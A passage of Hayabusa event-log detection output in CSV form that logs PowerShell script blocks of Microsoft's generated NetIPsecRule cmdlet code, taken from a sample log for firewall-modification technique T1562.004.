(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 
+09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and 
(@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 